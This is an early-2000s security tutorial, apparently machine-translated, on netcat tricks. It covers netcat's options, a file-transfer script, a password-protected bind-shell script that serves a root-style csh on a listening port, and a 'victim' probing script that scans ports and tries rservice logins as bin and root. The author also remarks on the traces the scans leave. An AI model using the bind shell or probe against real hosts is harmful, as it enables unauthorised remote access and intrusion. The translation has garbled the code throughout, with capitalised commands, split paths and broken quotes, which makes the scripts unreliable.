NC usage skills
Create time: 2001-03-02
Article attribute: original
Article submission:
Quack (QUACK_AT_XFOCUS.ORG)
NC usage skills
By QUACK
http://www.xfocus.org Security Focus
NC this little thing should be familiar, and it has been used n years ... There are not many nonsense here, combined with some Script talk about its skills.
(Script raised in the article comes from NC110.TGZ file package)
First, basically use
Quack # nc -h
[v1.10]
Want to connect to somewhere: nc [-Options] Hostname Port [S] [Ports] ...
Binding port waiting connection: nc -l -p port [-Options] [hostname] [port]
parameter:
The -e prog program is redirected, once connected, execute [danger !!]
-g Gateway Source-Routing Hop Point [S], UP TO 8
-G Num Source-Routing Pointer: 4, 8, 12, ...
-H Help information
-i secs delayed interval
-l listening mode for inbound connection
-n Specifies the IP address of the number, can't use Hostname
-o file records 16-based transmission
-P port local port number
-r arbitrarily designated local and remote ports
-s addr local source address
-u udp mode
-v detailed output - more detailed content with two -V
-w Secs Timeout time
-z turgs the input and output - when scanning
The port number can specify a specified range of LO-HI.
Second, used to transfer files - NCP
#! / bin / sh
## Similar to RCP, but use Netcat to do in high ports
## Do "NCP TargetFile" on the machine that receives the file
## Do "NCP Sourcefile ReceivingHost" on the machine that sends files
## If "NZP" is called, the transfer file is compressed
## Here you define the port you want to use, you can freely choose
Myport = 23456
## If the NC is not in the system path, you should take the following one line of comments to remove, modify
# PATH = $ {home}: $ {path}; export path
## The following line check parameter input
Test "$ 3" && echo "Too Many Args" && Exit 1
Test! "$ 1" && echo "no args? && exit 1
ME = `Echo $ 0 | SED 'S . * / '`
Test "$ me" = "NZP" && echo '[compressed mode]'
# if second arg, it's a host to send an [extra xtant] file to.if test "$ 2"; then
Test! -f "$ 1" && echo "Can't Find $ 1" && Exit 1
IF test "$ me" = "nzp"; then
Compress-C <"$ 1" | NC -V -W 2 $ 2 $ MyPort && Exit 0
Else
NC -V-W 2 $ 2 $ MyPort <"$ 1" && exit 0
Fi
Echo "Transfer Failed!"
EXIT 1
Fi
# Whether there is a file with the same name file in the current directory of the file machine
IF Test -f "$ 1"; then
echo -n "Overwrite $ 1?"
Read aa
Test! "$ aa" = "y" && echo "[PUNTED!]" && exit 1
Fi
# 30 Seconds Oughta Be PleeeeEuty of Time, But Change If You Want.
IF test "$ me" = "nzp"; then
# 注意 注意 这里 这里 用法, combine redirect symbols and pipelines
NC -V -W 30 -P $ myport -l dev / null | uncompress -c> "$ 1" && exit 0
Else
NC -V -W 30 -P $ myport -l dev / null> "$ 1" && exit 0
Fi
Echo "Transfer Failed!"
# Clean Up, Since Even IF The Transfer Failed, $ 1 IS Already TRASHED
RM -F "$ 1"
EXIT 1
In this case, I just take QUACKA # ncp ../ABCD on the A machine
Listening on [Any] 23456 ...
Then on another machine B
QUACKB # ncp abcd 192.168.0.2
QUACKB [192.168.0.1] 23456 (?)
The appearance on the plane
Open connection to [192.168.0.2] from quackb [192.168.0.1] 1027
#
Check out, the file is transferred.
Third, used to bind port --BSH
First of all, if you compile the Netcat, use only commands such as make FreeBSD to compile, this work
It is unavailable-to define a gaping_security_hole it will provide the -e option.
#! / bin / sh
## A script that uses NC binding shell and with password protection
## With a parameter, the port number
NC = NC
Case "$ 1" in
? *)
LPN = "$ 1"
Export LPN
Sleep 1
# Note The use of NCs here, parameter -L is Lister, -e is performing redirect
Echo "-l -p $ lpn -e $ 0"; $ nc -l -p $ lpn -e $ 0> / dev / null 2> & 1
Echo "Launched on Port $ LPN" EXIT 0
;
ESAC
# Here We Play inetd
Echo "-l -p $ lpn -e $ 0"; $ nc -l -p $ lpn -e $ 0> / dev / null 2> & 1
While Read QQ; Do
Case "$ qq" in
# This is a weak password to protect, the password is quack
Quact
CD /
EXEC CSH -I
;
ESAC
DONE
To see how it is used?
QUACK # ./bsh 6666 <------- Enter, behind is the program output
-L -P 6666-E ./bsh
Launched on Port 6666
Quack #
Quack ## nc localhost 6666 <---------- Enter
-L -P 6666-E ./bsh
QUACK <---------- Enter, password verification
Warning: Imported Path Contains Relative Components
WARNING: No Access To Tty (Bad file descriptor).
Thus no Job Control in this shell.
Cracker #
Fourth, used for port scan --Probe
In some of our common port scanners, such as VeteScan is written in Shell Script, many
Need Netcat installed in the system, what is the reason? Take a look at the script below, you may understand some.
#! / bin / sh
## Launch A Whole Buncha Shit at Yon Victim in No Particular Order; Capture
## stderr stdout in one place. Run as root for Rservation and low -p to work.
## fairly Thorous Example of Using Netcat To Collect a Lot of Host Info.
## Will Set Off Evey Intrusion Alarm in Existence ON A ParaNod Machine!
# There are some gadgets in this directory
DDIR = .. / data
# Specify a gateway
Gate = 192.157.69.11
# Might Conceivably Wanna Change this for Different Run Styles
UCMD = 'nc -v -w 8'
Test! "$ 1" && Echo Needs Victim Arg && Exit 1
Echo '| $ ucmd -w 9 -r "$ 1" 13 79 6667 2> & 1
Echo '0' | $ ucmd "$ 1" 79 2> & 1
# IF lsrr Was Passed Thru, Should Get Refusal Here:
# Be careful here, in fact, these parameters of NC can do a lot of things.
$ Ucmd-z -r -g $ GATE "$ 1" 6473 2> & 1
$ Ucmd -r -z "$ 1" 6000 4000-4004 111 53 2105 137-140 1-20 540-550 95 87 2> & 1
# -s `Hostname` May Be Wrong for Some Multihomed Machinesecho 'UDP Echoecho!' | NC -U -P 7 -S` Hostname` -w 3 "$ 1" 7 19 2> & 1
Echo '113, 10158' | $ ucmd -p 10158 "$ 1" 113 2> & 1
RService Bin Bin | $ UCMD -P 1019 "$ 1" shell 2> & 1
Echo quit | $ ucmd -w 8 -r "$ 1" 25 158 159 119 110 109 1109 142-144 220 23 2> & 1
# NewlineAfter Any Telnet Trash
echo ''
Echo Pasv | $ UCMD -R "$ 1" 21 2> & 1
Echo 'Get /' | $ UCMD -W 10 "$ 1" 80 81 210 70 2> & 1
# Sometimes Contains USEful Directory Info:
# Know what file is Robots.txt? ;)
Echo 'Get / Robots.txt' | $ ucmd -w 10 "$ 1" 80 2> & 1
# Now the big red lights go on
# Try using the gadget Rservice, which can be found in the NC110.TGZ Data directory
Rservice bin bin 9600/9600 | $ ucmd -p 1020 "$ 1" login 2> & 1
RService root root | $ ucmd -r "$ 1" EXEC 2> & 1
Echo 'Begin Big Udp - Everything May Look "Open" if packet-filtered "
Data -G <$ {ddir} /nfs-0.d | $ ucmd -i 1 -u "$ 1" 2049 | od-x 2> & 1
# no wait-time, Uses RTT Hack
Nc -V -Z -U -R "$ 1" 111 66-70 88 53 87 161-164 121-123 213 49 2> & 1
Nc -V -Z -U -R "$ 1" 137-140 694-712 747-770 175-180 2103 510-530 2> & 1
echo 'end big udp'
$ Ucmd -r -z "$ 1" 175-180 2000-2003 530-533 1524 1525 666 213 8000 6250 2> & 1
# @ Use ou identd-snifer!
ISCAN "$ 1" 21 25 79 80 111 53 6667 6000 2049 119 2> & 1
# this gets pretty Intrusive, But what the fuck. probe for portmap first
IF NC-W 5 -Z -U "$ 1" 111; then
Showmount -E "$ 1" 2> & 1) The use of ShowMount and RPCINFO may be arrested;)
RPCINFO -P "$ 1" 2> & 1fi
EXIT 0
It feels nothing to say, and the script itself explains everything. Of course, the script above is just an exemplary example, and when you are actually used,
This scan will leave a lot of traces, and the system administrator will be careful;)
Try more, think more, maybe you can use it to do more - you can see the script directory in nc110.tgz
Some scripts, have some ideas from it.